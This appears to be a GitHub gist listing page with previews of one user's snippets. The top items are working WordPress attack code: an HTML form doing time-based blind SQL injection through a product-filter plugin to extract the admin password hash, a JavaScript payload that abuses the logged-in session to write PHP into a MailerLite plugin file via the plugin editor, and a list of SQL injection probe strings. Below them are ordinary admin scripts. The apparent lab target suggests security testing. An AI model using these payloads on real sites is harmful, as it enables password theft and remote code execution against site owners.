Leo Semenenko lsemenenko
lsemenenko
/ a.html
Last active
March 21, 2026 07:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <body> | |
| <form id="step1" action="https://a.local/wp-admin/admin-ajax.php" method="POST"> | |
| <input name="action" value="woobe_filter_products"> | |
| <input name="filter_current_key" value="theory4_true"> | |
| <input name="filter_data" value="woobe_filter[post_date_from]=2100-01-01%27 OR IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1 LIMIT 1),2,1)=%27w%27,SLEEP(3),0)%23"> | |
| </form> | |
| <form id="step2" action="https://a.local/wp-admin/admin-ajax.php" method="POST" target="sink"> |
lsemenenko
/ t6-stage2.js
Created
March 21, 2026 04:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async()=>{try{t='official-mailerlite-sign-up-forms/src/Models/MailerLiteField.php';p='official-mailerlite-sign-up-forms/mailerlite.php';u='/wp-admin/plugin-editor.php?file='+encodeURIComponent(t)+'&plugin='+encodeURIComponent(p);h=await(await fetch(u,{credentials:'include'})).text();m=h.match(/name="nonce"\s+value="([^"]+)/);if(!m){document.body.prepend('T6_NONCE_FAIL');return;}b=new URLSearchParams({nonce:m[1],_wp_http_referer:'/wp-admin/plugin-editor.php?file='+encodeURIComponent(t)+'&plugin='+encodeURIComponent(p),newcontent:'<?php phpinfo(); exit; ?>',action:'update',file:t,plugin:p,'docs-list':'',submit:'Update File'});r=await fetch('/wp-admin/plugin-editor.php',{method:'POST',credentials:'include',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:b});x=await(await fetch('/wp-content/plugins/'+t+'?wf_t6=1&_='+Date.now(),{credentials:'include'})).text();document.body.prepend('T6_WRITE:'+r.status);document.body.prepend('T6_RCE:'+((x.includes('PHP Version')||x.includes('phpinfo()'))?'YES':' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| post_title | post_status | |
|---|---|---|
| baseline_probe_7392_unique | trash | |
| sqli_probe_7392_unique' OR (SELECT SLEEP(1)) OR '1'='2 | trash | |
| sqli_probe_7392_unique' OR (SELECT SLEEP(5)) OR '1'='2 | trash |
lsemenenko
/ gist:3a3b894ea406e745833d3dcb3662e836
Created
February 8, 2026 04:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { useState } from "react"; | |
| const MOCK_DATA = { | |
| profile: { | |
| name: "Leonid Kuznetsov", | |
| title: "Head of Engineering", | |
| company: "GridPane", | |
| avatar: "LK", | |
| status: "online", | |
| bio: "20 years of DevOps experience. Building high-performance WordPress hosting infrastructure at scale.", |
lsemenenko
/ combine_files.sh
Created
November 24, 2024 23:50
Combine files, with filename/dir hints, to load into AI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # =========================================================================== | |
| # File Combiner - Combines multiple files into a single file with path headers | |
| # =========================================================================== | |
| # | |
| # Description: | |
| # This script recursively combines files from a directory into a single file, | |
| # adding the file path as a comment before each file's content. Useful for | |
| # preparing codebases for AI analysis or documentation. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Check if API key is provided | |
| if [ $# -eq 0 ]; then | |
| echo "Usage: $0 <VULTR_API_KEY>" | |
| exit 1 | |
| fi | |
| # Vultr API key from command-line argument | |
| VULTR_API_KEY="$1" |
lsemenenko
/ gist:8282e34ef722e9e75843396ea3d13607
Created
January 21, 2021 03:49
Change all users with specific role to another role across MU network with WP-CLI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for i in $(sudo -u www-data wp site list --field=url); \ | |
| do | |
| echo ${i}; \ | |
| a="$(sudo -u www-data wp user list --url=${i} --role=SuperUser --field=user_login)"; \ | |
| if [[ ! -z "${a}" ]]; then \ | |
| sudo -u www-data wp user --url="${i}" update "${a}" --role "administrator"; \ | |
| echo "User ${a} updated for site ${i}."; \ | |
| fi; \ | |
| done |
lsemenenko
/ gist:b080ea195de92869449cd3f241b5ae7e
Created
March 22, 2020 09:12
Resize filesystem on live instance
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo file -s /dev/xvd* | |
| /dev/xvda: DOS/MBR boot sector | |
| /dev/xvda1: Linux rev 1.0 ext4 filesystem data, UUID=651cda91-e465-4685-b697-67aa07181279, volume name "cloudimg-rootfs" (needs journal recovery) (extents) (64bit) (large files) (huge files) | |
| sudo growpart /dev/xvda 1 | |
| sudo resize2fs /dev/xvda1 |
lsemenenko
/ gist:f47b93184afed83fd7c5589b4ff109f4
Last active
July 17, 2020 02:04
Format PDF text export from BOA for Tiller Import
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| pat='([0-9]{2}/[0-9]{2}/[0-9]{2}).(.*)\ (-?[0-9,]+\.[0-9]{2})' | |
| while IFS= read -r line; do | |
| [[ $line =~ $pat ]] && | |
| echo "${BASH_REMATCH[1]}|${BASH_REMATCH[2]}|${BASH_REMATCH[3]}" | |
| done <file.txt |
lsemenenko
/ main.sh
Created
February 22, 2020 06:18
Trigger Github Actions repository_dispatch with curl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TOKEN="" | |
| REPO="" # format: username/repository | |
| EVENT_TYPE="" | |
| curl -H "Accept: application/vnd.github.everest-preview+json" \ | |
| -H "Authorization: token ${TOKEN}" \ | |
| --request POST \ | |
| --data '{"event_type": "${EVENT_TYPE}"}' \ |
NewerOlder